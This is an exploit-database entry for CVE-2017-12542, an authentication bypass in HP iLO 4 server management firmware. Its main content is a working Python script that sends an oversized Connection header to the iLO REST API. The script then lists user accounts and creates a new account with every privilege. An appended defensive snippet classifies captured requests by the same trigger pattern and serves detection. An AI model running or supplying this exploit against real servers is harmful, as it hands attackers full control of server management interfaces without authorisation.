Vendor: Integrated Lights-Out 4
By: synacktiv
CVSS: 10.0 (CRITICAL)
Type: Remote Code Execution
CWE: 20
Product Name: Integrated Lights-Out 4
Affected Version From: 2.53
Affected Version To: 2.53
Patch Exists: YES
Related CVE: CVE-2017-12542
CPE: a:hewlett_packard:integrated_lights-out_4
Other Scripts: N/A
Platforms Tested: None
Year: 2018

Remote Code Execution Vulnerability in HP iLO

HP iLO 4 firmware version 2.53 and prior improperly validates user-supplied input. A remote attacker can trigger the flaw by sending a specially crafted HTTP request to the targeted system; successful exploitation allows arbitrary code execution on the target system.

Mitigation:

HP has released a security bulletin and software updates to address this vulnerability. Users are advised to apply the necessary updates.

Exploit-DB raw data:

#!/usr/bin/env python

"""
Exploit trigger was presented @reconbrx 2018

Vulnerability found and documented by synacktiv:
https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html

Original advisory from HP:
https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us

Other advisories for this CVE:
https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
https://securitytracker.com/id/1039222

IMPORTANT:
THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITIES COVERED BY CVE-2017-12542!!!
The two other vulns are critical as well, but only triggerable on the host itself.
"""

import json
import requests
import urllib3

# All HP iLO interfaces run on HTTPS, but most of them use a self-signed certificate,
# so certificate verification is disabled below and the resulting warning is silenced.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# A Connection header of 29 'A's is the trigger for the REST API authentication bypass.
exploit_trigger = {'Connection': 'A' * 29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'


def test(ip):
    """Send the trigger with a GET and return the parsed account list if the target answers."""
    url = accounts_url % ip
    try:
        response = requests.get(url, headers=exploit_trigger, verify=False)
    except Exception as e:
        return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

    try:
        data = json.loads(response.text)
    except Exception as e:
        return False, 'Target response not as expected! Exception data: %s' % (str(e),)

    return True, data


def exploit(ip, username, password):
    """Send the trigger with a POST that creates a new account holding every iLO privilege."""
    Oem = {
        'Hp': {
            'LoginName': username,
            'Privileges': {
                'LoginPriv': True,
                'RemoteConsolePriv': True,
                'UserConfigPriv': True,
                'VirtualMediaPriv': True,
                'iLOConfigPriv': True,
                'VirtualPowerAndResetPriv': True,
            }
        }
    }
    body = {
        'UserName': username,
        'Password': password,
        'Oem': Oem
    }
    url = accounts_url % ip

    try:
        response = requests.post(url, json=body, headers=exploit_trigger, verify=False)
    except Exception as e:
        return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

    if response.status_code in [requests.codes.ok, requests.codes.created]:
        return True, response.text
    else:
        return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)


if __name__ == '__main__':
    import argparse
    import sys
    parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
    parser.add_argument('ip', help='target IP')
    parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
    parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
    parser.add_argument('-u', help='username of the new admin user')
    parser.add_argument('-p', help='password of the new admin user')

    args = parser.parse_args()

    if args.e:
        if args.u is None or args.p is None:
            print('Username and password must be set for exploiting!')
            sys.exit()
        res, data = exploit(args.ip, args.u, args.p)
        if res:
            print('[+] Successfully added user!')
        else:
            print('[-] Error! %s' % data)

    elif args.t:
        res, data = test(args.ip)
        if res:
            print('[+] Target is VULNERABLE!')
            for i in data['Items']:
                print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
        else:
            print('[-] Error! %s' % data)
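As an added defensive example that is not part of the Exploit-DB script or the synacktiv advisory: the check below classifies raw HTTP request heads (as captured by a reverse proxy or IDS in front of the iLO management network) by whether their Connection header looks like the 29-byte trigger the script above sends to the iLO REST API. The 29-byte length threshold, the /rest/v1/ prefix and the sample requests are assumptions drawn from the script, not from HP's advisory.

```python
import re

TRIGGER_LEN = 29            # length of the Connection value sent by the script above (assumed threshold)
REST_PREFIX = "/rest/v1/"   # iLO 4 REST API prefix used by the script above
# RFC 7230 token characters; a legitimate Connection value is a comma-separated list of tokens
TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, {lowercase header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def connection_value_anomalous(value):
    """True if any list element is not an HTTP token, or if the value is at least as long
    as the published trigger (ordinary values are short: 'close', 'keep-alive', 'Upgrade')."""
    if len(value) >= TRIGGER_LEN:
        return True
    return any(not TOKEN_RE.match(t.strip()) for t in value.split(","))


def classify_request(raw):
    """'trigger' for an anomalous Connection header aimed at the REST API,
    'anomalous' for one aimed at another path, 'benign' otherwise."""
    _method, path, headers = parse_request(raw)
    value = headers.get("connection")
    if value is None or not connection_value_anomalous(value):
        return "benign"
    return "trigger" if path.startswith(REST_PREFIX) else "anomalous"


# Constructed sample request heads (not captured traffic); 192.0.2.10 is a documentation address.
SAMPLES = {
    "list_accounts_trigger": "GET /rest/v1/AccountService/Accounts HTTP/1.1\r\nHost: 192.0.2.10\r\nConnection: " + "A" * 29 + "\r\n\r\n",
    "normal_rest": "GET /rest/v1/AccountService/Accounts HTTP/1.1\r\nHost: 192.0.2.10\r\nAuthorization: Basic <redacted>\r\nConnection: keep-alive\r\n\r\n",
    "h2_upgrade": "GET /rest/v1/Systems/1 HTTP/1.1\r\nHost: 192.0.2.10\r\nConnection: Upgrade, HTTP2-Settings\r\n\r\n",
    "web_ui_odd": "GET /json/login_session HTTP/1.1\r\nHost: 192.0.2.10\r\nConnection: " + "A" * 29 + "\r\n\r\n",
}


def scan(samples=SAMPLES):
    """Map each sample name to its verdict."""
    return {name: classify_request(raw) for name, raw in samples.items()}
```

Only the length and token checks are signature-free; the path prefix merely raises the verdict, so an alert on "anomalous" is still worth a look.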